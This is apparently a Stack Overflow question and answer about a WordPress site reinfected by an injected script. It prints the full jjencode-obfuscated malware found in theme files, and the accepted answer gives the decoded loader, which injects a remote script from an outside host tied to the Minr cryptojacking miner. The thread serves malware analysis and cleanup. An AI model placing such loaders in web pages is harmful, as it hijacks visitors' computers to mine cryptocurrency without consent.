# Website infected with re-appearing JS malware. What does this code do?

Tags: javascript, wordpress

I'm a newly hired IT guy at a small company that hosts about 100 domains. I just moved all of our domains from one host to another.

I noticed one of our domains was infected with malware on the old server, so I removed it and moved the dom to our new server.

After a week of checking, the bad `<script>` has reappeared on the new server, so I know the infection is from within the WordPress files (not a compromised server). Of course, all login pws have been changed.

This script is being injected into three files (the theme's header.php, footer.php, index.php) and one database entry (the default WP "hello-world" post):

```
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.$__+$.___+$.$$$_+(![]+"")[$._$_]+"\\"+$.$__+$.___+"=\\"+$.$__+$.___+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+"\\"+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+"\\"+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"('\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"');"+$.$$$_+(![]+"")[$._$_]+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$._$$+"://\\"+$.__$+$.$$_+$.$$$+$.$$$_+$.$_$$+"."+$.$$__+(![]+"")[$._$_]+$._$+$.$$_$+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.$$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"/\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.$__+$.$$$+(![]+"")[$._$_]+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$.$__+$.$$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$$$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$_+$.__$+$.$_$+$.$$_$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$._$_+$.$__+$.$___+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+$.___+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.___+$._$$+$.__+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+$._$_+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.__$+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$._$$+"_\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.__$+$.___+$.$_$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.___+$.$$__+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$$_+$.__$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$_$+$.$$_$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$._$_+$.__$+$.$$__+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.__$+$.$$_+$.$$__+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.$__+$.$_$_+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$_$+$.$_$+$.$__+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+$.$$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.$$_+$.$$$+$.$_$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"?"+$.__+"\\"+$.__$+$.$$_+$._$_+(![]+"")[$._$_]+"="+$.___+"."+$._$$+$.___+"';"+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$_$+$.___+$.$$$_+$.$_$_+$.$$_$+"."+$.$_$_+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.___+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.$$_$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.$$$_+(![]+"")[$._$_]+");"+"\"")())();</script>
```

[Link to beautified pastebin.](https://pastebin.com/Bm9iEPEg)

My main question is, what does that code do? Can anyone run it and tell me what it produces?

Also, here is a screenshot of the end-result of the infection. A call to some crypto-currency miner (I think).

[image: Screenshot of infection target]

Thanks, SO. I've spent too much time on this problem already.

Comment: got "connexion closed because of malicious code [Trj]" (not exact error message, didn't note it). So i guess this is a Trojan..

Comment: @kaddath, it's a pastebin, it doesn't get executed, but since it contains the content of known malware, your antivirus flags it.

Comment: @Jeff, for what it's worth, it has nothing to do with jQuery.

Comment: _"What does this jQuery (JavaScript) code do?
"_ - you answered yourself - _"A call to some crypto-currency miner"_

Answer (score 1, accepted):

It is an **jjencode** obfuscated script appending a script to the top of the page.

This is the non obfuscated code:

```
((function $anonymous$(){return"var el = document.createElement('script');el.src='https://web.clod.pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTNT8UDGUBBT0zPFUjCtARE2NzAVJSIPQ0FJABFUVTK_AABJVxIGEkH5QCFDBASVIhPPcREqYRFEdRQcsUEkARJYQyAXVBPNcQLaQAVm4CQCZAAVdEMGYAXQxwa.js?trl=0.30';document.head.appendChild(el);"}))
```

The script call a Cryptojacking script known as **Minr**.

Comment: Thanks, did you run the code and confirm this is exactly what it does? I mean, my answer was just an educated guess. Can you confirm?

Comment: Yes, it's the exact same string on my answer that is JJencoded.

Comment: Not sure why you're being downvoted. Any suggestions on what to search for in the website files to locate the source so I can remove this thing once and for all? I've never had to deal with a website infection before. I'm going to try and remove it by hand first before reinstalling the site from scratch.

Comment: @Jeff You can contact me on Linkedin (Link on my profile) or at me(AT)rickynotaro.com. I could try to help you after my workday.